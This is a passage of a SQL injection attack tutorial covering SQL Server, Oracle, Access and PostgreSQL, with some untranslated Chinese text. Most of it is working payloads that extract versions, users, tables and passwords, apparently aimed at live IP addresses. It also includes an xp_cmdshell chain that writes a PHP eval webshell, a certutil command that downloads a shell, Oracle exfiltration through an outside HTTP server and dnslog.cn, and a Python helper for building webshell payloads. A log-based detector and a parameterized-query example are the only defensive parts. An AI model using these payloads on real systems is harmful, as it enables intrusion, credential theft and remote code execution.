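        if oracle(template.format(pos=pos, n=mid)):
            lo = mid
        else:
            hi = mid
    return hi


def extract(oracle, template: str, length: Optional[int] = None, max_len: int = 128) -> str:
    """Extract the whole string. With a known length (from a len() probe) exactly
    that many characters are fetched; otherwise positions are probed until one
    is missing, at the cost of one extra request."""
    chars = []
    for pos in range(1, (length or max_len) + 1):
        code = binary_search_char(oracle, template, pos)
        if code is None:
            break
        chars.append(chr(code))
    return "".join(chars)


def counting(oracle):
    """Wrap an oracle so the number of requests can be reported."""
    calls = {"n": 0}

    def wrapped(payload: str) -> bool:
        calls["n"] += 1
        return oracle(payload)

    return wrapped, calls


if __name__ == "__main__":
    for engine, template in TEMPLATES.items():
        oracle, calls = counting(simulated_oracle)
        print(engine, extract(oracle, template), "in", calls["n"], "requests")
```

Each character costs one request for the > 0 check plus seven halvings of the 0..127 interval, so a four-character name takes 32 requests when the length is known and 33 when the end has to be detected by a failing position.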

Time-based injection

Check for sysadmin:

if(1=(select is_srvrolemember('sysadmin'))) WAITFOR DELAY '0:0:2'

Check whether the web server and database server are separate. host_name() is the name of the client connecting to SQL Server, which for an injected query is the web server, and @@servername is the database server; a delay followed by the normal page means they are the same host:

if(host_name()=@@servername) WAITFOR DELAY '0:0:2'

Number of databases (55 is the character code of '7', so this delays when there are 7 databases):

IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))=55) WAITFOR DELAY '0:0:2'

Check whether xp_cmdshell is registered:

if(1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')) WAITFOR DELAY '0:0:2'--

More time-based payloads can be found in sqlmap. In every case the truth of the predicate is judged from the response time.

Union-based injection

First find the number of columns with order by:

1 order by 3  page normal

1 order by 4  page abnormal

So there are 3 columns.

Then use select NULL,NULL,<expression> to put the wanted data into a displayed column:

Database version

All database names

A trick for getting a shell on SQL Server

Prerequisites:

  1. the injection point supports stacked queries
  2. the current user is sysadmin (sa)
  3. sqlmap's --os-shell fails to get a shell

Since we are sa, why not simply run commands through xp_cmdshell? We can, but the output of those commands is not echoed back through the injection point. The idea is therefore to find the website's absolute path, write a webshell there, and work from the webshell.

We pick a file known to belong to the website, search the server's disks for it, write the resulting path into a table of our own, and read the path back out of that table.

The search commands are:

Find test.txt on the target's C: drive

for /r c:\ %i in (test*.txt) do @echo %i   #the * before the extension is required

dir /s /b c:\test.txt

Assume we already know the website contains a file test.txt.

Create a table hack with a single column tmp:

create table hack (tmp varchar(1000));--  

Check that the table was created:

python2 sqlmap.py -u http://192.168.10.20:88/index.php?id=1 -D test --tables

Search C: for test.txt and write the result into the tmp column of hack:

;insert into hack(tmp) exec master..xp_cmdshell 'dir /s /b c:\test.txt';--

;insert into hack(tmp) exec master..xp_cmdshell 'for /r c:\ %i in (test*.txt) do @echo %i';--

Either statement works.

Dump the table; the website's absolute path turns out to be C:\phpstudy\www

python2 sqlmap.py -u http://192.168.10.20:88/index.php?id=1 -D test -T hack --dump

Write the one-line webshell into the web root as shell.php. The < and > must be prefixed with ^, otherwise cmd.exe treats them as redirection operators:

1;exec master..xp_cmdshell 'echo ^<?php @eval($_POST[x]);?^> > C:\phpstudy\www\shell.php';--
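Getting the escaping right by hand is error-prone once the webshell contains more than < and >, so here is an added Python example (not code from the original page) that builds the echo payload: it caret-escapes every cmd.exe metacharacter, doubles single quotes for the T-SQL string literal, and assembles the stacked query. The webshell and path are the page's; everything else is the example's own.

```python
# Characters cmd.exe interprets on a command line; each must be prefixed with ^
# for echo to emit it literally. ^ is in the set so carets already in the
# payload are preserved instead of being consumed as escapes.
CMD_SPECIAL = set("^&|<>")


def cmd_escape(text: str) -> str:
    """Escape text for use as echo's argument on a cmd.exe command line."""
    return "".join("^" + c if c in CMD_SPECIAL else c for c in text)


def tsql_string(text: str) -> str:
    """T-SQL single-quoted literal; embedded quotes are doubled, not backslashed."""
    return "'" + text.replace("'", "''") + "'"


def xp_cmdshell_write(content: str, path: str) -> str:
    """Stacked-query fragment that writes `content` to `path` via echo.
    The space before > matches the page's payload; it means echo writes a
    trailing space before the newline, which PHP ignores."""
    cmd = "echo " + cmd_escape(content) + " > " + path
    return ";exec master..xp_cmdshell " + tsql_string(cmd) + ";--"


if __name__ == "__main__":
    print(xp_cmdshell_write("<?php @eval($_POST[x]);?>", r"C:\phpstudy\www\shell.php"))
```

A webshell that uses single quotes inside PHP (for example $_POST['x']) only needs the T-SQL doubling; cmd.exe does not treat single quotes specially.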

If the written webshell cannot be connected to, certutil can download one from the internet instead, provided the target has outbound access:

1;exec master..xp_cmdshell 'certutil -urlcache -split -f http://x.x.x.x/shell.php C:\phpstudy\www\shell2.php';--

Then connect to the downloaded shell2.php.

Oracle injection

Confirming the injection point

As with other engines, the injection point is detected by appending and conditions, here and 1=1 versus and 1=2. A time-delay function also works in practice.

http://219.153.49.228:43469/new_list.php?id=1%20and%201=1

http://219.153.49.228:43469/new_list.php?id=1%20and%201=2

Union-based injection

1. Determine the column count (2)

As elsewhere, order by finds the column count. order by 2 renders normally and order by 3 does not, so there are 2 columns.

http://219.153.49.228:43469/new_list.php?id=1%20order%20by%202


2. Find the displayed columns

union select is used, but unlike MySQL, Oracle is strict about column data types, so union select 1,2,3 will not do: character columns need character values and numeric columns numeric values. Here both columns are character, so union select 'null','null' is used. Every Oracle SELECT also needs a FROM clause, hence from dual.

(Sometimes union all select is used instead. The difference is that union all returns every row, duplicates included, whereas union de-duplicates and returns each distinct row once.)

#union query

http://219.153.49.228:43469/new_list.php?id=-1 union select null,null from dual

#replace null with 'null' to confirm both columns are character type

http://219.153.49.228:43469/new_list.php?id=-1 union select 'null','null' from dual

The displayed positions can then be replaced with subqueries.

3. Database version

http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select banner from sys.v_$version where rownum=1) from dual

4. Current database user

http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select sys_context('userenv','current_user') from dual) from dual

http://219.153.49.228:44768/new_list.php?id=-1 union select '1',user from dual

5. Current database (instance) name

http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select instance_name from V$INSTANCE) from dual

6. Table names

Usually one looks for an admin or user table.

Direct enumeration

First table name, LOGMNR_SESSION_EVOLVE$:

http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1) from dual

Second table name, LOGMNR_GLOBAL$:

http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual

Pattern search

Finding the sns_users table:

http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select table_name from user_tables where table_name like '%user%' and rownum=1) from dual

7. Column names

Direct enumeration

Columns of sns_users:

http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1) from dual

http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where rownum=1 and column_name not in 'USER_NAME') from dual

http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where rownum=1 and column_name not in 'USER_NAME' and column_name not in 'AGENT_NAME') from dual

……

http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where rownum=1 and column_name not in 'USER_NAME' and column_name not in 'AGENT_NAME' and column_name not in 'PROTOCOL' and column_name not in 'SPARE1' and column_name not in 'DB_USERNAME' and column_name not in 'OID' and column_name <> 'EVENTID' and column_name <> 'NAME' and column_name <> 'TABLE_OBJNO') from dual

Note that the second and later queries drop the table_name='sns_users' filter, so they walk the columns of every table the user can see; keep the filter to stay within sns_users.

 

This yields the columns USER_NAME, AGENT_NAME, PROTOCOL, SPARE1, DB_USERNAME, OID, EVENTID, NAME, TABLE_OBJNO, USAGE, USER_PWD, …

 

Pattern search

http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%') from dual

http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%' and column_name <> 'USER_NAME') from dual

8. Data

Username and password column contents:

http://219.153.49.228:43469/new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1

http://219.153.49.228:43469/new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong'

http://219.153.49.228:43469/new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'

9. Prettier output

Oracle concatenates strings with ||

http://219.153.49.228:44768/new_list.php?id=-1 union select 'username:'||USER_NAME,'password:'||USER_PWD from "sns_users" where rownum=1

Error-based injection

Error-based injection runs a subquery inside a function that raises an error whose message includes the subquery's result, so the data comes back on the error page. Several such functions follow, each with a typical query; in practice only the inner subquery is swapped out.

1. ctxsys.drithsx.sn()

#current database user (here ORACLE1)

?id=1 and 1=ctxsys.drithsx.sn(1,(select user from dual)) --

#database version

?id=1 and 1=ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1)) --

2. XMLType()

?id=1 and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null --

3. dbms_xdb_version.checkin()

#database version

?id=1 and (select dbms_xdb_version.checkin((select banner from sys.v_$version where rownum=1)) from dual) is not null --

4. dbms_xdb_version.makeversioned()

#current database user (here ORACLE1)

?id=1 and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null --

5. dbms_xdb_version.uncheckout()

#database version

?id=1 and (select dbms_xdb_version.uncheckout((select banner from sys.v_$version where rownum=1)) from dual) is not null --

6. dbms_utility.sqlid_to_sqlhash()

#database version

?id=1 and (SELECT dbms_utility.sqlid_to_sqlhash((select banner from sys.v_$version where rownum=1)) from dual) is not null --

7. ordsys.ord_dicom.getmappingxpath()

?id=1 and 1=ordsys.ord_dicom.getmappingxpath((select banner from sys.v_$version where rownum=1),user,user)--

8. utl_inaddr.*()

utl_inaddr resolves host names and IP addresses on the LAN or the Internet; handing it a value that cannot be resolved raises an error that contains the value.

?id=1 and 1=utl_inaddr.get_host_name((select user from dual)) --

?id=1 and 1=utl_inaddr.get_host_address((select user from dual)) --

Boolean-based blind injection

Common guesses:

#guess the length

?id=1 and 6=(select length(user) from dual)

#take one character and guess its ASCII value

?id=1 and (select ascii(substr(user,1,1)) from dual)>83

Boolean blind injection with decode

decode(expression, value1, value2, value3)

When expression equals value1 the function returns value2, otherwise value3.

Test the user name length:

http://219.153.49.228:44768/new_list.php?id=1 and 6=(select length(user) from dual) --

Test whether the current user is SYSTEM:

#normal page if the user is SYSTEM, abnormal otherwise

http://219.153.49.228:44768/new_list.php?id=1 and 1=(select decode(user,'SYSTEM',1,0) from dual) --

#use substr to test one character at a time

http://219.153.49.228:44768/new_list.php?id=1 and 1=(select decode(substr(user,1,1),'S',1,0) from dual) --

?id=1 and 1=(select decode(substr(user,2,1),'Y',1,0) from dual) --

?id=1 and 1=(select decode(substr(user,3,1),'S',1,0) from dual) --

?id=1 and 1=(select decode(substr(user,4,1),'T',1,0) from dual) --

?id=1 and 1=(select decode(substr(user,5,1),'E',1,0) from dual) --

?id=1 and 1=(select decode(substr(user,6,1),'M',1,0) from dual) --

#the ASCII value can be tested the same way

?id=1 and 1=(select decode(ascii(substr(user,1,1)),'83',1,0) from dual) --

Boolean blind injection with instr

What instr does:

select instr('abcdefgh','de') position from dual;  #returns 4

In blind injection:

http://219.153.49.228:44768/new_list.php?id=1 and 1=(instr((select user from dual),'SYS')) --

?id=1 and 4=(instr((select user from dual),'T')) --

Time-based blind injection

1. Confirming the vulnerability

DBMS_PIPE.RECEIVE_MESSAGE reads a message from a named pipe.

Usage: DBMS_PIPE.RECEIVE_MESSAGE('pipename',timeout)

pipename is a varchar(128) naming the pipe; any value will do here, since nothing is ever sent on it.

timeout is an optional integer giving the number of seconds to wait.

Common payload:

http://219.153.49.228:44768/new_list.php?id=1 and 1=dbms_pipe.receive_message('o', 10)--

If the page takes 10 seconds to come back, the injection exists.

2. Time-based blind injection with decode

Put the delaying call into decode:

#guess the character directly

?id=1 and 1=(select decode(substr(user,1,1),'S',dbms_pipe.receive_message('o',5),0) from dual) --

#guess via the ASCII value

?id=1 and 1=(select decode(ascii(substr(user,1,1)),'83',dbms_pipe.receive_message('o',5),0) from dual) --

3. Using a slow query as the delay

A heavy query such as (select count(*) from all_objects) takes measurable time, so it can stand in for dbms_pipe.receive_message() where that is unavailable. Simply substitute it for decode()'s result:

#guess the character directly

?id=1 and 1=(select decode(substr(user,1,1),'S',(select count(*) from all_objects),0) from dual) --

#guess via the ASCII value

?id=1 and 1=(select decode(ascii(substr(user,1,1)),'83',(select count(*) from all_objects),0) from dual) --

Out-of-band injection

1. utl_http.request()

This requires the user to have network access rights for utl_http.
First check that the package is available; a normal page means it is:

?id=1 and exists (select count(*) from all_objects where object_name='UTL_HTTP') --

Then start an HTTP server with python, or listen with nc. Here python serves:

python3 -m http.server 4455

#subquery the version and request it from the python server

?id=1 and utl_http.request('http://192.168.100.130:4455/'||(select banner from sys.v_$version where rownum=1))=1--

#when sent over HTTP the || can be URL-encoded

?id=1 and utl_http.request('http://192.168.100.130:4455/'%7C%7C(select banner from sys.v_$version where rownum=1))=1--

The data shows up in the server's request log.

2. utl_inaddr.get_host_address()

#exfiltrate through a DNS log service

?id=1 and (select utl_inaddr.get_host_address((select user from dual)||'.eeaijt.dnslog.cn') from dual)is not null --

3. SYS.DBMS_LDAP.INIT()

?id=1 and (select SYS.DBMS_LDAP.INIT((select user from dual)||'.51prg6.dnslog.cn',80) from dual)is not null --

?id=1 and (select DBMS_LDAP.INIT((select user from dual)||'.51prg6.dnslog.cn',80) from dual)is not null --

4. HTTPURITYPE()

?id=1 and (select HTTPURITYPE('http://192.168.100.130:4455/'||(select user from dual)).GETCLOB() FROM DUAL)is not null --

Again this needs a python HTTP server or an nc listener.

The request returns 404, but the data still arrives in the request path.

 

getshell

To be added

Access數據庫注入

在Office 2007之前的Access數據庫文件的后綴是 .mdb ,Office2007及其之后的Access數據庫文件的后綴是 .accdb 。

Access數據庫屬於文件型數據庫,所以不需要端口號。

Access數據庫中沒有注釋符號.因此  /**/   、 --   和   #   都沒法使用。

Access是小型數據庫,當容量到達100M左右的時候性能就會開始下降。

Access數據庫不支持錯誤顯示注入,Access數據庫不能執行系統命令。

Access沒有數據庫的概念,所有的表都是在同一個數據庫下。

顯錯注入(union聯合查詢)

只需要先找到注入點,通過order by進行字段判斷,再使用可控輸入對目標數據庫進行聯合注入即可,本質上和MySQL的聯合注入差不多,不過它沒有information_schema庫,需要猜解它的表名和列名,如果猜對了就會在網頁上回顯。可以將以下常用的表名和列名進行猜解:

Common table names:

admin,a_admin,x_admin,m_admin,adminuser,admin_user,article_admin,administrator,manage,manager,member,memberlist,user,users,Manage_User,user_info,admin_userinfo,UserGroups,user_list,login,用戶,Friend,zl,movie,news,password,clubconfig,config,company,book,art,dv_admin,userinfo

Common column names:

username,adminusername,admin_username,adminname,admin_name,admin,adminuser,admin_user,usrname,usr_name,user_admin,password,admin_password,administrator,administrators,adminpassword,adminpwd,admin_pwd,adminpass,admin_pass,usrpass,usr_pass,user,name,pass,userpass,user_pass,userpassword,user_password,pwd,userpwd,user_pwd,useradmin,pword,p_word,pass-wd,yonghu,用戶,用戶名,密碼,帳號,id,uid,userid,user_id,adminid,admin_id,login_name

 

Guessing method

Guessing table names:

Use the exists keyword:
After confirming the SQL injection, test whether the admin table exists: if it does, the query runs normally; if not, a syntax error is raised. Then enumerate table names to brute-force them.

and exists(select * from  admin)

Column names are guessed the same way, by enumeration only.

Once the admin table is confirmed, determine how many columns it has: if 1 through 10 query normally and 11 gives a syntax error, the table has 10 columns.

and exists(select * from admin order by 10)

After the column count, determine the actual column names. The statement below tests whether a name column exists: if so, the query runs normally; otherwise a syntax error is raised. Then enumerate column names to brute-force them.

and exists(select name from admin)

Boolean-based blind injection

The first few steps are the same as for union-based injection.

Common functions

select len("string")        length of the given string

select asc("a")             ASCII value of the given character

top  n                      return the first n records

select mid("string",2,1)    substring of the given string, starting at position 2 with length 1

Retrieving data through boolean-based blind injection:

Access has no LIMIT, so the number of rows returned cannot be restricted that way. Instead TOP can be used: top 1 returns only the first row of the result, so top 3 returns the first three rows.
Guess the length of the first value in the admin column: if >5 returns no data and >4 returns normally, the first value in the admin column is 5 characters long.

and (select top 1 len(admin)from admin)>5

 

Guess the ASCII code of the first character of the first row in the admin column: if >97 returns no data and >96 returns normally, the ASCII value of that character is 97.

and (select top 1 asc(mid(admin,1,1))from admin)>97

Second character of the first row

and (select top 1 asc(mid(admin,2,1))from admin)>97

 

From the second row onward a different statement is needed, because TOP can only return the first few rows. So we use a nested query: first select the top two rows, then reverse the order, then take the first row, which is the second row of data.

Length of the admin column in the second row

and (select top 1 len(admin)  from ( select top 2 * from information order by id)  order by id desc)>55

The third character of the second row

and (select top 1 asc(mid(admin,3,1))  from ( select top 2 * from information order by id)  order by id desc)>55

The fourth character of the third row

and (select top 1 asc(mid(admin,4,1))  from ( select top 3 * from information order by id)  order by id desc)>55

 

 

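Added example, not from the original article: boolean-based blind extraction like the statements above produces a long run of requests from one client that differ only in a numeric threshold (>5, >4, >97, >96, ...). The script below normalises constructed query strings into templates (string and numeric literals replaced by ?) and flags a client that sends many distinct requests sharing one template, which catches the probing regardless of which table or column names were guessed. The request list, client addresses and thresholds are all constructed for the example; the same approach applies to the PostgreSQL pg_sleep probes later on the page.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample requests as (client_ip, query string); not from a real server.
# 10.0.0.4 repeats one ordinary request; 10.0.0.8 walks numeric thresholds the way
# the Access boolean-blind statements above do.
SAMPLE_REQUESTS = [
    ("10.0.0.4", "id=1"),
    ("10.0.0.4", "id=1"),
    ("10.0.0.4", "id=1"),
    ("10.0.0.4", "id=1"),
    ("10.0.0.4", "id=1"),
    ("10.0.0.4", "id=1"),
    ("10.0.0.8", "id=1 and (select top 1 len(admin) from admin)>5"),
    ("10.0.0.8", "id=1 and (select top 1 len(admin) from admin)>4"),
    ("10.0.0.8", "id=1 and (select top 1 asc(mid(admin,1,1)) from admin)>64"),
    ("10.0.0.8", "id=1 and (select top 1 asc(mid(admin,1,1)) from admin)>96"),
    ("10.0.0.8", "id=1 and (select top 1 asc(mid(admin,1,1)) from admin)>112"),
    ("10.0.0.8", "id=1 and (select top 1 asc(mid(admin,1,1)) from admin)>104"),
    ("10.0.0.8", "id=1 and (select top 1 asc(mid(admin,1,1)) from admin)>97"),
    ("10.0.0.8", "id=1 and (select top 1 asc(mid(admin,2,1)) from admin)>97"),
]

STR_RE = re.compile(r"'[^']*'|\"[^\"]*\"")  # quoted string literals
NUM_RE = re.compile(r"\b\d+\b")             # bare integer literals
WS_RE = re.compile(r"\s+")


def templatize(query):
    """Reduce a query string to its shape: literals become '?', case and
    whitespace are normalised, so probes that differ only in the threshold
    or the character position collapse into one template."""
    text = unquote_plus(query).lower()
    text = STR_RE.sub("?", text)
    text = NUM_RE.sub("?", text)
    return WS_RE.sub(" ", text).strip()


def detect_blind_probing(requests, min_requests=4, min_variants=4):
    """Group requests by (client, template). A client that sends many requests
    with the same shape but different literals is walking a search space, the
    fingerprint of blind inference; identical repeats (page refreshes) are not."""
    groups = defaultdict(list)
    for ip, query in requests:
        groups[(ip, templatize(query))].append(query)

    report = []
    for (ip, template), raw in groups.items():
        variants = len(set(raw))
        if len(raw) >= min_requests and variants >= min_variants:
            report.append({
                "ip": ip,
                "template": template,
                "requests": len(raw),
                "variants": variants,
            })
    report.sort(key=lambda item: (-item["requests"], item["ip"]))
    return report


if __name__ == "__main__":
    for item in detect_blind_probing(SAMPLE_REQUESTS):
        print(item)
```

The two len() probes alone fall under the threshold, and the six refreshes from 10.0.0.4 have only one distinct value, so only the asc(mid(...)) walk from 10.0.0.8 is reported. Thresholds should be tuned per endpoint; the point is that the signal survives even when no known table name appears in the request.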
PostgreSQL database injection

PostgreSQL is a very full-featured free-software object-relational database management system (ORDBMS), descended from version 4.2 of the POSTGRES project.

After installation, PostgreSQL listens on port 5432 by default; the default user is postgres and the default database is also postgres.

 

Comment symbol: --

Delay function: pg_sleep(3)

Like MySQL, PostgreSQL also has information_schema.

Common commands

select CURRENT_SCHEMA()           #current schema

select user                       #user

select current_user               #current user

select chr(97)                    #ASCII code to character

select chr(97)||chr(100)||chr(109)||chr(105)||chr(110)  #ASCII codes to a string (spells admin)

SELECT session_user;

SELECT usename FROM pg_user;

SELECT getpgusername();

select version()                  #PostgreSQL version

SELECT current_database()         #current database

select length('admin')            #string length

 

select case when(expr1) then result1 else result2 end;  #if expr1 is true, result1; otherwise result2

Example: select case when(current_user='postgres') then pg_sleep(5) else pg_sleep(0) end;

 

select pg_read_file('/etc/passwd');          #read a file

select system('whoami');                     #execute a system command; only available below 11.2

COPY (select '<?php phpinfo();?>') to '/tmp/1.php';   #write a file

 

|| string concatenation

DISTINCT removes duplicates

CAST type conversion   cast ('1' as numeric)    converts '1' to a numeric type

1::text                casts the value to the text type

Numeric(10,2)          a numeric field with precision 10 and two decimal places

case...when...then...else...end  conditional expression

COALESCE(expr1,expr2…..)     returns the first non-NULL value in the list, or NULL if every value is NULL.

Union-based injection (UNION query)

order by 3   #find the number of columns

select null,null,function

From here on it is the same as MySQL injection; the PostgreSQL statements can be taken from sqlmap.

Getting schema names (schemaname)

Reference from sqlmap:

    ?uid=1 UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(112)||CHR(113)||CHR(113))||COALESCE(CAST(schemaname AS CHARACTER(10000)),(CHR(32)))||(CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113)),NULL FROM pg_tables

Simplified:

    ?uid=1 UNION SELECT NULL,COALESCE(CAST(schemaname AS CHARACTER(10000)),(CHR(32))),NULL FROM pg_tables--

Syntax notes:

    COALESCE(expression[,n])    returns the value of the first non-NULL argument (column); note that NULL is not the empty string ''
    cast ('1' as numeric)       converts '1' to a numeric type

Further simplified:

    ?uid=1 UNION SELECT NULL,schemaname,NULL FROM pg_tables--

The default schema name (schemaname) for user-created databases is public.

Getting table names

Reference from sqlmap:

    ?uid=1 UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(112)||CHR(113)||CHR(113))||COALESCE(CAST(tablename AS CHARACTER(10000)),(CHR(32)))||(CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113)),NULL FROM pg_tables WHERE schemaname IN ((CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)))

Simplified:

    ?uid=1 UNION ALL SELECT NULL,tablename,NULL FROM pg_tables WHERE schemaname IN ('public')

Getting column names

Reference from sqlmap:

    ?uid=1 UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(112)||CHR(113)||CHR(113))||COALESCE(CAST(attname AS CHARACTER(10000)),(CHR(32)))||(CHR(106)||CHR(115)||CHR(97)||CHR(110)||CHR(101)||CHR(117))||COALESCE(CAST(typname AS CHARACTER(10000)),(CHR(32)))||(CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113)),NULL FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname=(CHR(116)||CHR(98)||CHR(117)||CHR(115)||CHR(101)||CHR(114)) AND nspname=(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99))--

Simplified:

    ?uid=1 UNION SELECT NULL,attname,NULL FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='tbuser' AND nspname='public'--

Getting table contents

Reference from sqlmap:

    UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(112)||CHR(113)||CHR(113))||COALESCE(CAST(id AS CHARACTER(10000)),(CHR(32)))||(CHR(106)||CHR(115)||CHR(97)||CHR(110)||CHR(101)||CHR(117))||COALESCE(CAST(passwd AS CHARACTER(10000)),(CHR(32)))||(CHR(106)||CHR(115)||CHR(97)||CHR(110)||CHR(101)||CHR(117))||COALESCE(CAST(username AS CHARACTER(10000)),(CHR(32)))||(CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113)),NULL FROM public.tbuser--

Simplified:

    ?uid=1 UNION ALL SELECT NULL,COALESCE(CAST(id AS CHARACTER(10000)),(CHR(32)))||COALESCE(CAST(username AS CHARACTER(10000)),(CHR(32)))||COALESCE(CAST(passwd AS CHARACTER(10000)),(CHR(32))),NULL FROM public.tbuser--

Further simplified:

    ?uid=1 UNION ALL SELECT NULL,id||','||username||','||passwd,NULL FROM public.tbuser--

Error-based injection

Reference from sqlmap:

    uid=1 AND 7778=CAST((CHR(113)||CHR(98)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (7778=7778) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(112)||CHR(106)||CHR(113)) AS NUMERIC)

Syntax notes:

    cast ('1' as numeric)    converts '1' to a numeric type

    Numeric(10,2)          a numeric field with precision 10 and two decimal places

    1::text                casts the value to the text type

    case...when...then...else...end  conditional expression

 

Get the version:

    select * from tbuser  where id=1 AND 7778=CAST((SELECT version())::text AS NUMERIC)

Get schema names:

    select * from tbuser  where id=1 AND 7778=CAST((SELECT schemaname FROM pg_tables limit 1)::text AS NUMERIC)

    select * from tbuser  where id=1 AND 7778=CAST((SELECT schemaname FROM pg_tables where schemaname not in ('public') limit 1)::text AS NUMERIC)

 

Time-based blind injection

select pg_sleep(3)

1. SELECT CASE WHEN (length(current_database())=6) THEN pg_sleep(3) ELSE pg_sleep(0) END  --+      #guess the length of the database name

2. SELECT CASE WHEN (COALESCE(ASCII(SUBSTR((CURRENT_SCHEMA()),1,1)),0) > 100) THEN pg_sleep(14) ELSE pg_sleep(0) END LIMIT 1--+   #guess the database name character by character

3. SELECT CASE WHEN (length(current_user)=6) THEN pg_sleep(3) ELSE pg_sleep(0) END  --+   #guess the length of the current user name

4. SELECT CASE WHEN (COALESCE(ASCII(SUBSTR((current_user),1,1)),0) > 100) THEN pg_sleep(14) ELSE pg_sleep(0) END LIMIT 1--+   #guess the user name character by character

Boolean-based blind injection

1 AND ASCII(SUBSTRING((SELECT COALESCE(CAST(COUNT(DISTINCT(schemaname)) AS CHARACTER(10000)),(CHR(32))) FROM pg_tables)::text FROM 1 FOR 1))>48

Stacked queries

Same as stacked injection in MySQL: just append further statements.

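Added example, not from the original article: the root cause behind the union, error-based, time-based and stacked payloads in this section is the same, untrusted request text concatenated into the statement. Below, a vulnerable query builder is shown beside a hardened one that validates uid as a plain integer and binds it as a DB-API parameter (psycopg2-style %s placeholder) while restricting the ORDER BY column to an allowlist, because identifiers cannot be bound. The table public.tbuser comes from the page's own queries; the column allowlist, function names and sample inputs are constructed for the example. Both builders return the statement and parameters rather than executing them, so the example runs without a database.

```python
import re

# Hypothetical allowlist of columns the application may sort by. Identifiers
# cannot be passed as bound parameters, so they are checked against a fixed set.
ALLOWED_ORDER_COLUMNS = ("id", "username")


class RejectedInput(ValueError):
    """Raised when request input does not have the expected shape."""


def build_query_vulnerable(uid, order_by="id"):
    """The pattern every payload in this section relies on: request text is
    spliced straight into the statement, so '1 UNION SELECT ...',
    '1 AND 7778=CAST(...)' or '1; SELECT pg_sleep(3)' all become SQL."""
    return f"SELECT id, username FROM public.tbuser WHERE id={uid} ORDER BY {order_by}"


def build_query_safe(uid, order_by="id"):
    """Return (sql, params) for a DB-API driver such as psycopg2.
    uid is validated and bound as a parameter, so it is data and can never
    alter the statement; the ORDER BY column is allowlisted instead."""
    uid_text = str(uid).strip()
    if not re.fullmatch(r"[0-9]{1,10}", uid_text):
        raise RejectedInput(f"uid is not a plain integer: {uid_text[:40]!r}")
    if order_by not in ALLOWED_ORDER_COLUMNS:
        raise RejectedInput(f"order_by column not permitted: {order_by!r}")
    sql = f"SELECT id, username FROM public.tbuser WHERE id = %s ORDER BY {order_by}"
    return sql, (int(uid_text),)


# Inputs shaped like the union, error-based, time-based and stacked statements
# in this section (constructed for the example).
INJECTION_SAMPLES = (
    "1 UNION SELECT NULL,schemaname,NULL FROM pg_tables--",
    "1 AND 7778=CAST((SELECT version())::text AS NUMERIC)",
    "1 AND (SELECT CASE WHEN (length(current_user)=6) THEN pg_sleep(3) ELSE pg_sleep(0) END) IS NOT NULL--",
    "1; SELECT pg_sleep(3)--",
)


def rejects(uid, order_by="id"):
    """True if the hardened builder refuses the input."""
    try:
        build_query_safe(uid, order_by)
    except RejectedInput:
        return True
    return False


if __name__ == "__main__":
    for sample in INJECTION_SAMPLES:
        print("vulnerable:", build_query_vulnerable(sample))
        print("hardened  :", "rejected" if rejects(sample) else build_query_safe(sample))
    print(build_query_safe(" 42 ", order_by="username"))
```

With a real connection the hardened form is executed as cur.execute(sql, params); the driver sends the integer separately from the statement text, so none of the CAST, pg_sleep or UNION constructs above can reach the parser, and a non-numeric uid is refused before any database round trip.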
Other

(1) Read a file:

select pg_read_file('filepath/filename');

(2) Execute a command:

select system('command_string');

(3) Write a file:

COPY (select '<?php phpinfo();?>') to '/tmp/1.php';

 

 

 

References

MySQL:https://xz.aliyun.com/t/7169

SQL Server : https://www.anquanke.com/post/id/200154

Oracle : https://xz.aliyun.com/t/9940

Access : https://www.freebuf.com/articles/web/284283.html

https://blog.csdn.net/qq_36119192/article/details/86468579

